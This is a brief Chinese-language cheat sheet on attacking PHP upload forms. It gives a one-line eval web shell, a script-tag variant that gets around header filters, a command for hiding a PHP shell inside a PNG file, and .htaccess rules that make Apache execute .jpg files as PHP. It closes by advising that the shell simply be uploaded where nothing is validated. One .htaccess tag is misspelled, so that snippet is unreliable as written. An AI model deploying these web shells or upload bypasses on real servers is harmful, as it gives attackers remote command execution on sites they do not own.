目录
基础知识
一句话木马
<?php
@eval($_POST['hack'])
?>
绕过过滤php头的木马
<script language="php">@eval($_POST['pass'])</script>
图片马的制作
首先准备一个比较小的png文件(可以用画图画一个),然后有个php小马
命令如下:
copy 1.png/a+1.php/b 2.png
.htaccess
[htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能]()
简单来说,就是我们上传一个.htaccess文件到服务器,然后服务器之后会将特定格式的文件以php格式解析。
版本一:
<FilesMath ".jpg">
SetHandler application/x-httpd-php
</FilesMatch>
版本二:
AddType application/x-httpd-php .jpg
无验证:
我们直接上传一个一句话木马即可